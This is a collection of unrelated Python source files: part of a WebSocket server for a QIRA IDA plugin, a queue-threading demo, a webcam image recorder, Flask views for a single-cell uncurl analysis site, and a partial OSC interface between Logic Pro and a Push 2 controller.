"Connection: Upgrade\r\n"
"Sec-WebSocket-Origin: %(origin)s\r\n"
"Sec-WebSocket-Protocol: qira\r\n"
"Sec-WebSocket-Location: %(type)s://%(host)s%(location)s\r\n\r\n"
)
GUIDStr = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
STREAM = 0x0
TEXT = 0x1
BINARY = 0x2
CLOSE = 0x8
PING = 0x9
PONG = 0xA
HEADERB1 = 1
HEADERB2 = 3
LENGTHSHORT = 4
LENGTHLONG = 5
MASK = 6
PAYLOAD = 7
def __init__(self, server, sock, address):
self.server = server
self.client = sock
self.address = address
self.handshaked = False
self.headerbuffer = ''
self.readdraftkey = False
self.draftkey = ''
self.headertoread = 2048
self.hixie76 = False
self.fin = 0
self.data = None
self.opcode = 0
self.hasmask = 0
self.maskarray = None
self.length = 0
self.lengtharray = None
self.index = 0
self.request = None
self.usingssl = False
self.state = self.HEADERB1
# restrict the size of header and payload for security reasons
self.maxheader = 65536
self.maxpayload = 4194304
def close(self):
self.client.close()
self.state = self.HEADERB1
self.hasmask = False
self.handshaked = False
self.readdraftkey = False
self.hixie76 = False
self.headertoread = 2048
self.headerbuffer = ''
self.data = ''
def handleMessage(self):
pass
def handleConnected(self):
pass
def handleClose(self):
pass
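    # Subclasses override the three no-op handlers above. A minimal echo handler would look
    # like this (illustrative only; the plugin's QiraServer is expected to subclass WebSocket
    # in the same way):
    #   class Echo(WebSocket):
    #       def handleMessage(self):
    #           if self.data:
    #               self.sendMessage(self.data)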
def handlePacket(self):
# close
if self.opcode == self.CLOSE:
self.sendClose()
raise Exception("received client close")
# ping
elif self.opcode == self.PING:
pass
# pong
elif self.opcode == self.PONG:
pass
# data
elif self.opcode == self.STREAM or self.opcode == self.TEXT or self.opcode == self.BINARY:
self.handleMessage()
def handleData(self):
# do the HTTP header and handshake
if self.handshaked is False:
data = self.client.recv(self.headertoread)
if data:
# accumulate
self.headerbuffer += data
if len(self.headerbuffer) >= self.maxheader:
raise Exception('header exceeded allowable size')
                # we need to read the entire 8 bytes after the HTTP header; make sure we do
if self.readdraftkey is True:
self.draftkey += self.headerbuffer
read = self.headertoread - len(self.headerbuffer)
if read != 0:
self.headertoread = read
else:
# complete hixie76 handshake
self.handshake_hixie76()
# indicates end of HTTP header
elif '\r\n\r\n' in self.headerbuffer:
self.request = HTTPRequest(self.headerbuffer)
# hixie handshake
if self.request.headers.has_key('Sec-WebSocket-Key1'.lower()) and self.request.headers.has_key('Sec-WebSocket-Key2'.lower()):
# check if we have the key in our buffer
index = self.headerbuffer.find('\r\n\r\n') + 4
# determine how much of the 8 byte key we have
read = len(self.headerbuffer) - index
# do we have all the 8 bytes we need?
if read < 8:
self.headertoread = 8 - read
self.readdraftkey = True
if read > 0:
self.draftkey += self.headerbuffer[index:index+read]
else:
# get the key
self.draftkey += self.headerbuffer[index:index+8]
# complete hixie handshake
self.handshake_hixie76()
# handshake rfc 6455
elif self.request.headers.has_key('Sec-WebSocket-Key'.lower()):
key = self.request.headers['Sec-WebSocket-Key'.lower()]
hStr = self.handshakeStr % { 'acceptstr' : base64.b64encode(hashlib.sha1(key + self.GUIDStr).digest()) }
self.sendBuffer(hStr)
self.handshaked = True
self.headerbuffer = ''
try:
self.handleConnected()
except:
pass
else:
raise Exception('Sec-WebSocket-Key does not exist')
# remote connection has been closed
else:
raise Exception("remote socket closed")
# else do normal data
else:
data = self.client.recv(2048)
if data:
for val in data:
if self.hixie76 is False:
self.parseMessage(ord(val))
else:
self.parseMessage_hixie76(ord(val))
else:
raise Exception("remote socket closed")
def handshake_hixie76(self):
k1 = self.request.headers['Sec-WebSocket-Key1'.lower()]
k2 = self.request.headers['Sec-WebSocket-Key2'.lower()]
spaces1 = k1.count(" ")
spaces2 = k2.count(" ")
num1 = int("".join([c for c in k1 if c.isdigit()])) / spaces1
num2 = int("".join([c for c in k2 if c.isdigit()])) / spaces2
key = ''
key += struct.pack('>I', num1)
key += struct.pack('>I', num2)
key += self.draftkey
typestr = 'ws'
if self.usingssl is True:
typestr = 'wss'
response = self.hixiehandshakedStr % { 'type' : typestr, 'origin' : self.request.headers['Origin'.lower()], 'host' : self.request.headers['Host'.lower()], 'location' : self.request.path }
self.sendBuffer(response)
self.sendBuffer(hashlib.md5(key).digest())
self.handshaked = True
self.hixie76 = True
self.headerbuffer = ''
try:
self.handleConnected()
except:
pass
def sendClose(self):
msg = bytearray()
if self.hixie76 is False:
msg.append(0x88)
msg.append(0x00)
self.sendBuffer(msg)
else:
pass
def sendBuffer(self, buff):
size = len(buff)
tosend = size
index = 0
while tosend > 0:
try:
# i should be able to send a bytearray
sent = self.client.send(str(buff[index:size]))
if sent == 0:
raise RuntimeError("socket connection broken")
index += sent
tosend -= sent
except socket.error as e:
# if we have full buffers then wait for them to drain and try again
if e.errno == errno.EAGAIN:
time.sleep(0.001)
else:
raise e
#if s is a string then websocket TEXT is sent else BINARY
def sendMessage(self, s):
if self.hixie76 is False:
header = bytearray()
isString = isinstance(s, str)
if isString is True:
header.append(0x81)
else:
header.append(0x82)
b2 = 0
length = len(s)
if length <= 125:
b2 |= length
header.append(b2)
elif length >= 126 and length <= 65535:
b2 |= 126
header.append(b2)
header.extend(struct.pack("!H", length))
else:
b2 |= 127
header.append(b2)
header.extend(struct.pack("!Q", length))
if length > 0:
self.sendBuffer(header + s)
else:
self.sendBuffer(header)
header = None
else:
msg = bytearray()
msg.append(0)
if len(s) > 0:
msg.extend(str(s).encode("UTF8"))
msg.append(0xFF)
self.sendBuffer(msg)
msg = None
def parseMessage_hixie76(self, byte):
if self.state == self.HEADERB1:
if byte == 0:
self.state = self.PAYLOAD
self.data = bytearray()
elif self.state == self.PAYLOAD:
if byte == 0xFF:
self.opcode = 1
self.length = len(self.data)
try:
self.handlePacket()
finally:
self.data = None
self.state = self.HEADERB1
else :
self.data.append(byte)
# if length exceeds allowable size then we except and remove the connection
if len(self.data) >= self.maxpayload:
raise Exception('payload exceeded allowable size')
def parseMessage(self, byte):
# read in the header
if self.state == self.HEADERB1:
# fin
self.fin = (byte & 0x80)
# get opcode
self.opcode = (byte & 0x0F)
self.state = self.HEADERB2
elif self.state == self.HEADERB2:
mask = byte & 0x80
length = byte & 0x7F
if mask == 128:
self.hasmask = True
else:
self.hasmask = False
if length <= 125:
self.length = length
# if we have a mask we must read it
if self.hasmask is True:
self.maskarray = bytearray()
self.state = self.MASK
else:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
elif length == 126:
self.lengtharray = bytearray()
self.state = self.LENGTHSHORT
elif length == 127:
self.lengtharray = bytearray()
self.state = self.LENGTHLONG
elif self.state == self.LENGTHSHORT:
self.lengtharray.append(byte)
if len(self.lengtharray) > 2:
raise Exception('short length exceeded allowable size')
if len(self.lengtharray) == 2:
self.length = struct.unpack_from('!H', str(self.lengtharray))[0]
if self.hasmask is True:
self.maskarray = bytearray()
self.state = self.MASK
else:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
elif self.state == self.LENGTHLONG:
self.lengtharray.append(byte)
if len(self.lengtharray) > 8:
raise Exception('long length exceeded allowable size')
if len(self.lengtharray) == 8:
self.length = struct.unpack_from('!Q', str(self.lengtharray))[0]
if self.hasmask is True:
self.maskarray = bytearray()
self.state = self.MASK
else:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
# MASK STATE
elif self.state == self.MASK:
self.maskarray.append(byte)
if len(self.maskarray) > 4:
raise Exception('mask exceeded allowable size')
if len(self.maskarray) == 4:
# if there is no mask and no payload we are done
if self.length <= 0:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
# we have no mask and some payload
else:
self.index = 0
self.data = bytearray()
self.state = self.PAYLOAD
# PAYLOAD STATE
elif self.state == self.PAYLOAD:
if self.hasmask is True:
self.data.append( byte ^ self.maskarray[self.index % 4] )
else:
self.data.append( byte )
# if length exceeds allowable size then we except and remove the connection
if len(self.data) >= self.maxpayload:
raise Exception('payload exceeded allowable size')
# check if we have processed length bytes; if so we are done
if (self.index+1) == self.length:
try:
self.handlePacket()
finally:
self.state = self.HEADERB1
self.data = None
else:
self.index += 1
class SimpleWebSocketServer(object):
def __init__(self, host, port, websocketclass):
self.websocketclass = websocketclass
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.serversocket.bind((host, port))
self.serversocket.listen(5)
self.connections = {}
self.listeners = [self.serversocket]
self.forceclose = False
def decorateSocket(self, sock):
return sock
def constructWebSocket(self, sock, address):
return self.websocketclass(self, sock, address)
def close(self):
self.serversocket.close()
for conn in self.connections.itervalues():
try:
conn.handleClose()
except:
pass
conn.close()
self.forceclose = True
def serveforever(self):
while True:
rList, wList, xList = select(self.listeners, [], self.listeners, 1)
if self.forceclose:
break
for ready in rList:
                if ready == self.serversocket:
                    # initialise so the except clause below cannot hit a NameError if accept() fails
                    sock = None
                    address = 'unknown client'
                    try:
sock, address = self.serversocket.accept()
newsock = self.decorateSocket(sock)
newsock.setblocking(0)
fileno = newsock.fileno()
self.listeners.append(fileno)
self.connections[fileno] = self.constructWebSocket(newsock, address)
except Exception as n:
logging.debug(str(address) + ' ' + str(n))
if sock is not None:
sock.close()
else:
client = self.connections[ready]
try:
client.handleData()
except Exception as n:
logging.debug(str(client.address) + ' ' + str(n))
try:
client.handleClose()
except:
pass
client.close()
del self.connections[ready]
self.listeners.remove(ready)
for failed in xList:
if failed == self.serversocket:
self.close()
raise Exception("server socket failed")
else:
client = self.connections[failed]
try:
client.handleClose()
except:
pass
client.close()
del self.connections[failed]
self.listeners.remove(failed)
class SimpleSSLWebSocketServer(SimpleWebSocketServer):
def __init__(self, host, port, websocketclass, certfile, keyfile, version = ssl.PROTOCOL_TLSv1):
SimpleWebSocketServer.__init__(self, host, port, websocketclass)
        self.certfile = certfile
self.keyfile = keyfile
self.version = version
def close(self):
super(SimpleSSLWebSocketServer, self).close()
def decorateSocket(self, sock):
        sslsock = ssl.wrap_socket(sock,
                                  server_side=True,
                                  certfile=self.certfile,
                                  keyfile=self.keyfile,
                                  ssl_version=self.version)
return sslsock
def constructWebSocket(self, sock, address):
ws = self.websocketclass(self, sock, address)
ws.usingssl = True
return ws
def serveforever(self):
super(SimpleSSLWebSocketServer, self).serveforever()
###################
# #
# QIRA CODE #
# #
###################
class QiraServer(WebSocket):
def handleMessage(self):
msg_queue.append(self.data)
idaapi.execute_sync(handle_message_queue, idaapi.MFF_WRITE)
def handleConnected(self):
idaapi.msg("[QIRA Plugin] Client connected\n")
def handleClose(self):
idaapi.msg("[QIRA Plugin] WebSocket closed\n")
|
problem_with_builtin_queue.py
|
from queue import Queue
from threading import Lock, Thread, currentThread
from time import sleep
# One way to break the built-in Queue.join() is to make the producer sleep between put() calls:
# unfinished_tasks can drop back to 0 while the producer is still running, so the consumer's
# task_done() calls notify join() and it returns before all items have been produced.
# A join()-safe variant is sketched at the end of this file.
q = Queue()
def producer():
for i in range(10):
q.put(i)
print(f"producer {i}")
sleep(1)
q.put(None)
def consumer():
while True:
item = q.get()
        if item is None:
q.task_done()
break
q.task_done()
print(f"consumer {item}")
t1 = Thread(target=producer)
t2 = Thread(target=consumer)
t1.start()
t2.start()
q.join()
print(12)
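# A join()-safe variant (illustrative sketch, not part of the original demo): join the producer
# thread first so every put() has happened before queue.join() is consulted, then wait for the
# consumer to drain the queue. Call safe_main() to run it.
def safe_main():
    q2 = Queue()

    def safe_producer():
        for i in range(10):
            q2.put(i)
        q2.put(None)  # sentinel telling the consumer to stop

    def safe_consumer():
        while True:
            item = q2.get()
            q2.task_done()
            if item is None:
                break
            print(f"consumer {item}")

    p = Thread(target=safe_producer)
    c = Thread(target=safe_consumer)
    p.start()
    c.start()
    p.join()   # all items (and the sentinel) have been put
    q2.join()  # unfinished_tasks == 0 now really means "everything was consumed"
    c.join()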
|
start.py
|
import cv2
import time
from pathlib import Path
from datetime import datetime
from threading import Thread
import queue
from typing import Union
def dt_name(dt: datetime) -> str:
"""Convert datetime object to path string."""
return dt.strftime('%Y%m%d-%H%M%S-%f')
def create_path(root: Path, subfolder: Union[str, Path]) -> Path:
"""Set up path and ensure it exists."""
newpath = root
if not newpath.is_dir():
raise ValueError('Root path does not exist: {}'.format(str(root)))
newpath = newpath.joinpath(subfolder)
if not newpath.is_dir():
newpath.mkdir()
return newpath
class CVReader():
"""OpenCV webcam reader."""
    def __init__(self, image_queue: queue.Queue):
"""Init."""
self.image_queue = image_queue
self._running = False
def terminate(self):
"""Terminate thread."""
self.stop()
def stop(self):
"""Stop webcam capturing."""
self._running = False
def run(self):
"""Start webcam capturing."""
cam = cv2.VideoCapture(0)
self._running = True
while self._running:
# Read frame
ret, frame = cam.read()
if not ret:
print('ERROR: Failed to grab frame.')
time.sleep(0.01)
continue
self.image_queue.put((frame, datetime.now()))
cam.release()
def record_images(root_folder: Union[str, Path]):
"""Use opencv to record timestamped images from the webcam."""
# Setup paths
    if not root_folder:
        root_folder = Path.cwd()
    # create_path expects a Path, so coerce here since the type hint also allows str
    root_folder = create_path(Path(root_folder), 'data')
current_subfolder = create_path(root_folder, dt_name(datetime.now()))
print('Starting in new folder:', current_subfolder)
# Setup Window
cv2.namedWindow(__file__)
# Setup queue and thread
image_queue = queue.Queue()
cvreader = CVReader(image_queue=image_queue)
cvreader_thread = Thread(target = cvreader.run)
cvreader_thread.start()
while True:
# Get frame
frame = None
while not image_queue.empty():
try:
(frame, dt) = image_queue.get(block=True, timeout=1)
except queue.Empty:
frame = None
continue
if frame is not None:
# Store frame
img_name = current_subfolder.joinpath('frame_{}.png'.format(dt_name(dt)))
cv2.imwrite(str(img_name), frame)
# Only the last frame in a queue is shown (else the queue will grow)
if frame is not None:
# Show frame
cv2.imshow(__file__, frame)
        # User interaction
key = cv2.waitKey(33)
if key == -1:
# No key pressed
continue
elif key in (27, ord('q')):
# Quit (ESC, q)
cvreader.terminate()
print('Quit with:', key)
break
elif key in (13, 32):
# Start in new folder (ENTER, SPACE)
current_subfolder = create_path(root_folder, dt_name(datetime.now()))
print('Starting in new folder:', current_subfolder)
cv2.destroyAllWindows()
cvreader_thread.join()
if __name__ == '__main__':
root_folder = Path.cwd()
record_images(root_folder)
|
views.py
|
import json
from multiprocessing.dummy import Process
import os
import uuid
from flask import Markup, render_template, request, redirect, send_from_directory, url_for, Blueprint, current_app
from werkzeug.utils import secure_filename
import numpy as np
import uncurl
from .cache import cache
from .generate_analysis import generate_uncurl_analysis, get_progress
from .data_stats import Summary
views = Blueprint('views', __name__, template_folder='templates')
# TODO: allow this to upload multiple files with multiple genes
def load_upload_data(request_files, request_form, path=None):
# TODO: should we merge the datasets here... or merge them in a downstream step?
data_paths = []
gene_paths = []
shapes = []
output_filenames = []
data_names = []
for key, f in request_files.items():
if 'fileinput' in key:
input_id = key.split('-')[1]
output_filename = secure_filename(f.filename)
if output_filename == '':
return
output_filenames.append(output_filename)
# allow for mtx input data
input_type = request_form['inputtype-{0}'.format(input_id)]
if output_filename.endswith('.mtx.gz') or output_filename.endswith('.mtx'):
input_type = 'sparse'
if input_type == 'dense':
data_filename = 'data_{0}.txt'.format(input_id)
if output_filename.endswith('.gz'):
data_filename = 'data_{0}.txt.gz'.format(input_id)
data_path = os.path.join(path, data_filename)
f.save(data_path)
elif input_type == 'sparse':
data_filename = 'data_{0}.mtx'.format(input_id)
if output_filename.endswith('.mtx.gz'):
data_filename = 'data_{0}.mtx.gz'.format(input_id)
data_path = os.path.join(path, data_filename)
f.save(data_path)
shape = request_form['data_shape-{0}'.format(input_id)]
shapes.append(shape)
# TODO: try to find gene names
data_paths.append(data_path)
try:
gene_file = request_files['genenames-{0}'.format(input_id)]
print(gene_file)
gene_output_file = load_gene_names(gene_file, path, input_id)
gene_paths.append(gene_output_file)
except:
gene_paths.append(None)
data_name = request_form['data_name-{0}'.format(input_id)]
if len(data_name) == 0:
data_name = str(input_id)
data_names.append(data_name)
init = None
return data_paths, gene_paths, data_names, init, shapes
def load_gene_names(f, path=None, index=1):
gene_filename = secure_filename(f.filename)
gene_output_path = os.path.join(path, 'gene_names_{0}.txt'.format(index))
if gene_filename.endswith('genes.csv'):
import pandas as pd
data = pd.read_csv(f)
try:
gene_names = data['gene_name']
gene_names.to_csv(gene_output_path, header=None, index=None)
except Exception as e:
print(e)
f.seek(0)
f.save(gene_output_path)
elif gene_filename.endswith('features.tsv'):
import pandas as pd
data = pd.read_csv(f, sep='\t', header=None)
try:
gene_names = data[1]
gene_names.to_csv(gene_output_path, header=None, index=None)
except Exception as e:
print(e)
f.seek(0)
f.save(gene_output_path)
else:
f.save(gene_output_path)
return gene_output_path
@views.route('/help')
def help():
return render_template('help.html')
@views.route('/state_estimation')
@cache.cached()
def state_estimation():
return render_template('state_estimation.html')
@views.route('/state_estimation/input', methods=['POST'])
def state_estimation_input():
user_id = str(uuid.uuid4())
if 'username' in request.form:
if len(request.form['username']) > 0:
# make username a safe string
keep_chars = set(['-', '_', ' '])
username = request.form['username'].strip()[:25]
username = ''.join([c for c in username if c.isalnum() or (c in keep_chars)])
user_id = user_id + '-' + username
base_path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
os.makedirs(base_path)
# save request.form
with open(os.path.join(base_path, 'inputs.json'), 'w') as f:
f.write(json.dumps(request.form))
request_file = request.files
request_form = request.form
# use batch effect correction button
use_batch_correction = False
if 'use_batch_correction' in request.form:
use_batch_correction = request.form['use_batch_correction']
data_paths, gene_paths, output_filenames, init, shapes = load_upload_data(request_file, request_form, base_path)
P = Process(target=state_estimation_preproc, args=(user_id, base_path, data_paths, gene_paths, output_filenames, init,
shapes,
use_batch_correction))
P.start()
return redirect(url_for('views.state_estimation_result', user_id=user_id))
@views.route('/state_estimation/results/<user_id>/start', methods=['POST'])
def state_estimation_start(user_id):
"""
Actually start the process of state estimation.
This saves a file called 'params.json' in /tmp/uncurl/<user_id>
containing all parameters used in state estimation.
"""
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
gene_names_file = os.path.join(path, 'gene_names.txt')
if not os.path.exists(gene_names_file):
gene_names_file = None
# TODO: deal with init here - make note if it's qualitative or
# quantitative
# run qualNorm???
init_path= os.path.join(path, 'init.txt')
if not os.path.exists(init_path):
init_path = None
# load json params
with open(os.path.join(path, 'preprocess.json')) as f:
preprocess = json.load(f)
for key in request.form.keys():
preprocess[key] = request.form[key]
# params.json contains all input parameters to the state estimation, as well as all stats from preprocess.json.
with open(os.path.join(path, 'params.json'), 'w') as f:
json.dump(preprocess, f)
P = Process(target=state_estimation_thread, args=(user_id, gene_names_file, init_path, path, preprocess, current_app.config.copy()))
P.start()
return redirect(url_for('views.state_estimation_result', user_id=user_id))
@views.route('/state_estimation/results/<user_id>/')
def state_estimation_result(user_id):
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
if os.path.exists(os.path.join(path, 'sc_analysis.json')):
return redirect(url_for('interaction_views.view_plots', user_id=user_id))
elif os.path.exists(os.path.join(path, 'preprocess.json')):
uncurl_is_running = os.path.exists(os.path.join(path, 'submitted'))
current_task = 'None'
time_remaining = 'Unknown'
with open(os.path.join(path, 'preprocess.json')) as f:
preprocess = json.load(f)
try:
with open(os.path.join(path, 'read_count_hist_data.json')) as f:
read_count_hist_data = f.read()
with open(os.path.join(path, 'gene_count_hist_data.json')) as f:
gene_count_hist_data = f.read()
with open(os.path.join(path, 'gene_mean_hist_data.json')) as f:
gene_mean_hist_data = f.read()
except:
summary = Summary(None, None, base_path=path)
read_count_hist_data, gene_count_hist_data, gene_mean_hist_data = summary.generate_plotly_jsons()
if uncurl_is_running:
# get running time information (highly approximate)
current_task, time_remaining = get_progress(path)
# update with actual input parameters
with open(os.path.join(path, 'params.json')) as f:
preprocess.update(json.load(f))
uncurl_has_error = False
if time_remaining == 'error':
# TODO: if there is an error here...
uncurl_has_error = True
return render_template('state_estimation_user.html',
user_id=user_id, has_preview=True,
uncurl_is_done=False,
uncurl_is_running=uncurl_is_running,
uncurl_has_error=uncurl_has_error,
read_count_hist_data=read_count_hist_data,
gene_count_hist_data=gene_count_hist_data,
gene_mean_hist_data=gene_mean_hist_data,
current_task=current_task,
time_remaining=time_remaining,
**preprocess)
elif os.path.exists(os.path.join(path, 'error.txt')):
error_txt = ''
with open(os.path.join(path, 'error.txt')) as f:
error_txt = f.read()
return error(error_txt, 404)
else:
return render_template('state_estimation_user.html',
user_id=user_id, uncurl_is_running=False,
uncurl_is_done=False,
has_result=False)
# this gzips the directory and returns a download
@views.route('/<x>/results/<user_id>/download_all')
def state_estimation_download_all(x, user_id):
if x!='test':
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
if not os.path.exists(path):
path = os.path.join(current_app.config['SECONDARY_USER_DATA_DIR'], user_id)
if not os.path.exists(path):
return error('Data not found', 404)
else:
path = os.path.join(current_app.config['TEST_DATA_DIR'], user_id)
filename = user_id + '.tar.gz'
output_filename = os.path.join(current_app.config['USER_DATA_DIR'], filename)
create_tar = True
# update tarball if path is newer than output_filename
if os.path.exists(output_filename):
        tar_mtime = os.stat(output_filename).st_mtime
create_tar = False
for base, dirs, files in os.walk(path):
for f in files:
if os.stat(os.path.join(base, f)).st_mtime > tar_mtime:
create_tar = True
break
if create_tar:
import subprocess
subprocess.call(['tar', '-czf', output_filename, path])
print('download_all', path, filename)
return send_from_directory(current_app.config['USER_DATA_DIR'], filename)
@views.route('/<x>/results/<user_id>/<filename>')
def state_estimation_file(x, user_id, filename):
if x != 'test':
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
else:
path = os.path.join(current_app.config['TEST_DATA_DIR'], user_id)
print('download: ', path)
return send_from_directory(path, filename)
@views.route('/<x>/results/<user_id>/data_download')
def data_download(x, user_id):
if x!='test':
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
else:
path = os.path.join(current_app.config['TEST_DATA_DIR'], user_id)
files = os.listdir(path)
files.sort()
return render_template('data_download.html',
user_id=user_id,
test_or_user=x,
files=files)
def state_estimation_preproc(user_id, base_path, data_paths, gene_paths, output_filenames,
init=None,
shapes=['gene_cell'],
use_batch_correction=False):
# TODO: update for multiple data/genes
"""
Preprocessing for state estimation - generates summary statistics,
etc...
"""
# TODO: combine datasets
if base_path is None:
base_path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
try:
summary = Summary(data_paths, gene_paths, base_path, shapes=shapes, dataset_names=output_filenames, use_batch_correction=use_batch_correction)
read_count_hist_data, gene_count_hist_data, gene_mean_hist_data = summary.load_plotly_json()
summary.preprocessing_params()
except:
import traceback
text = traceback.format_exc()
with open(os.path.join(base_path, 'error.txt'), 'w') as f:
f.write(text)
def state_estimation_preproc_simple(user_id, base_path, data_path):
"""
Preprocessing, assuming that the data has already been merged.
"""
# TODO: combine datasets
if base_path is None:
base_path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
try:
summary = Summary(None, None, base_path)
read_count_hist_data, gene_count_hist_data, gene_mean_hist_data = summary.load_plotly_json()
summary.preprocessing_params()
except:
import traceback
text = traceback.format_exc()
with open(os.path.join(base_path, 'error.txt'), 'w') as f:
f.write(text)
def state_estimation_thread(user_id, gene_names=None, init_path=None, path=None, preprocess=None, config=None):
"""
Uses a new process to do state estimation. Assumes that the input data is already saved in a directory named /tmp/uncurl/<user_id>/.
Args:
user_id (str)
gene_names (str or array, optional): path to a list of gene names, or an array of gene names. Default: None
init_path (str, optional): path to txt matrix of shape (genes, k). Default: None.
path (str, optional): Path where data and results are saved.
preprocess (dict): dict containing additional parameters: min_reads, max_reads, normalize, is_sparse, is_gz, disttype, genes_frac, cell_frac, vismethod, baseline_vismethod
config (dict): current_app.config
"""
if path is None:
path = os.path.join(config['USER_DATA_DIR'], user_id)
# get correct data names
data = os.path.join(path, 'data.mtx')
if preprocess['is_gz']:
data += '.gz'
if not os.path.exists(data):
data = os.path.join(path, 'data.txt')
if preprocess['is_gz']:
data += '.gz'
# TODO: it's really confusing where the param names come from in
# the preprocess dict - they come from the input names in
# state_estimation_user.html.
dist_type = preprocess['disttype']
if dist_type=='Poisson':
pass
elif dist_type=='Negative binomial':
dist_type = 'nb'
elif dist_type == 'Log-Normal':
dist_type = 'lognorm'
uncurl_args = config['UNCURL_ARGS']
if dist_type != 'Poisson':
uncurl_args = config['NMF_ARGS']
if dist_type == 'Poisson':
uncurl_args['write_progress_file'] = os.path.join(path, 'progress.txt')
uncurl_args['dist'] = dist_type
# TODO: deal with init
if init_path is not None:
pass
# params.json is saved in path, so it does not need to be passed.
generate_uncurl_analysis(data, path,
**uncurl_args)
@views.route('/qual2quant')
def qual2quant():
return render_template('qual2quant.html')
@views.route('/qual2quant/input')
def qual2quant_input():
if 'fileinput' not in request.files or 'qualinput' not in request.files:
return error('Missing data input', 400)
cell_file = request.files['fileinput']
qual_file = request.files['qualinput']
cell_data = np.loadtxt(cell_file)
qual_data = np.loadtxt(qual_file)
user_id = str(uuid.uuid4())
P = Process(target=qual2quant_thread, args=(cell_data, qual_data, user_id))
P.start()
    return redirect(url_for('views.qual2quant_result', user_id=user_id))
def qual2quant_thread(data, qual, user_id):
centers = uncurl.qualNorm(data, qual)
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
    with open(os.path.join(path, 'qual2quant_centers.txt'), 'w') as f:
np.savetxt(f, centers)
@views.route('/qual2quant/results/<user_id>')
def qual2quant_result(user_id):
if os.path.exists(os.path.join(current_app.config['USER_DATA_DIR'], user_id, 'qual2quant_centers.txt')):
return render_template('qual2quant_user.html',
user_id=user_id, has_result=True,
visualization=None)
else:
return render_template('qual2quant_user.html',
user_id=user_id, has_result=False)
def error(msg, code):
return render_template('error.html', msg=msg), code
|
logic_interface.py
|
from oscpy.client import OSCClient
from oscpy.server import OSCThreadServer
import definitions
import threading
import asyncio
import time
import push2_python
osc_send_host = "127.0.0.1"
osc_send_port = 8000
osc_receive_port = 9004
tracks_state_fps = 4.0
transport_state_fps = 10.0
bpm_button_names = [
push2_python.constants.BUTTON_UPPER_ROW_1,
push2_python.constants.BUTTON_UPPER_ROW_2,
push2_python.constants.BUTTON_UPPER_ROW_3,
push2_python.constants.BUTTON_UPPER_ROW_4,
push2_python.constants.BUTTON_UPPER_ROW_5,
push2_python.constants.BUTTON_UPPER_ROW_6,
push2_python.constants.BUTTON_UPPER_ROW_7,
push2_python.constants.BUTTON_UPPER_ROW_8
]
def to_utf8(utf8):
return utf8.decode("utf-8")
class LogicInterface(definitions.LogicMode):
app = None
count = 0
osc_sender = None
osc_server = None
state_transport_check_thread = None
state_tracks_check_thread = None
last_received_tracks_raw_state = ""
parsed_state = {}
def __init__(self, app):
self.app = app
self.osc_sender = OSCClient(osc_send_host, osc_send_port, encoding='utf8')
self.osc_server = OSCThreadServer()
sock = self.osc_server.listen(address='0.0.0.0', port=osc_receive_port, default=True)
self.osc_server.bind(b'/stateFromLogic/play', self.update_play_button)
self.osc_server.bind(b'/stateFromLogic/click', self.update_metronome_button)
self.osc_server.bind(b'/stateFromLogic/beats', self.bpm_lights)
self.osc_server.bind(b'/stateFromLogic/record', self.update_record_button)
# self.run_get_state_transport_thread()
# self.run_get_state_tracks_thread()
def run_get_state_transport_thread(self):
self.state_transport_check_thread = threading.Thread(target=self.check_transport_state)
self.state_transport_check_thread.start()
def run_get_state_tracks_thread(self):
self.state_tracks_check_thread = threading.Thread(target=self.check_tracks_state)
self.state_tracks_check_thread.start()
def check_transport_state(self):
while True:
time.sleep(1.0 / transport_state_fps)
self.osc_sender.send_message('/state/transport', [])
def check_tracks_state(self):
while True:
time.sleep(1.0 / tracks_state_fps)
self.osc_sender.send_message('/state/tracks', [])
def update_play_button(self, value):
definitions.isPlaying = True if value == 1.0 else False
self.app.logic_interface.get_buttons_state()
def update_metronome_button(self, value):
definitions.isMetronome = True if value == 1.0 else False
self.app.logic_interface.get_buttons_state()
def update_record_button(self, value):
definitions.isRecording = True if value == 1.0 else False
self.app.logic_interface.get_buttons_state()
def automate(self):
self.osc_sender.send_message('/push2/automate', [])
def repeat(self):
self.osc_sender.send_message('/push2/repeat', [])
def layout(self):
self.osc_sender.send_message('/push2/layout', [])
def session(self):
self.osc_sender.send_message('/push2/session', [])
def add_track(self):
self.osc_sender.send_message('/push2/add_track', [])
def device(self):
self.osc_sender.send_message('/push2/device', [])
def mix(self):
self.osc_sender.send_message('/push2/mix', [])
def browse(self):
self.osc_sender.send_message('/push2/browse', [])
def clip(self):
self.osc_sender.send_message('/push2/clip', [])
def fixed_length(self):
self.osc_sender.send_message('/push2/fixed_length', [])
def new(self):
self.osc_sender.send_message('/push2/new', [])
def new_next(self):
self.osc_sender.send_message('/push2/new_next', [])
def duplicate(self):
self.osc_sender.send_message('/push2/duplicate', [])
    def quantize(self, index, quantize, shift, loop, repeat, off):
        # Table-driven version of the original per-value if/elif chains; behaviour is unchanged.
        # Map the note-length label to the fragment used in the /push2/quantize OSC paths.
        bases = {
            '1/32t': '1_32T', '1/32': '1_32',
            '1/16t': '1_16T', '1/16': '1_16',
            '1/8t': '1_8T', '1/8': '1_8',
            '1/4t': '1_4T', '1/4': '1_4',
        }
        base = bases.get(index)
        if base is None:
            return
        # Flag priority matches the original chains: quantize, shift, repeat, loop, off.
        if quantize:
            suffix = '_quantize'
        elif shift:
            suffix = '_shift'
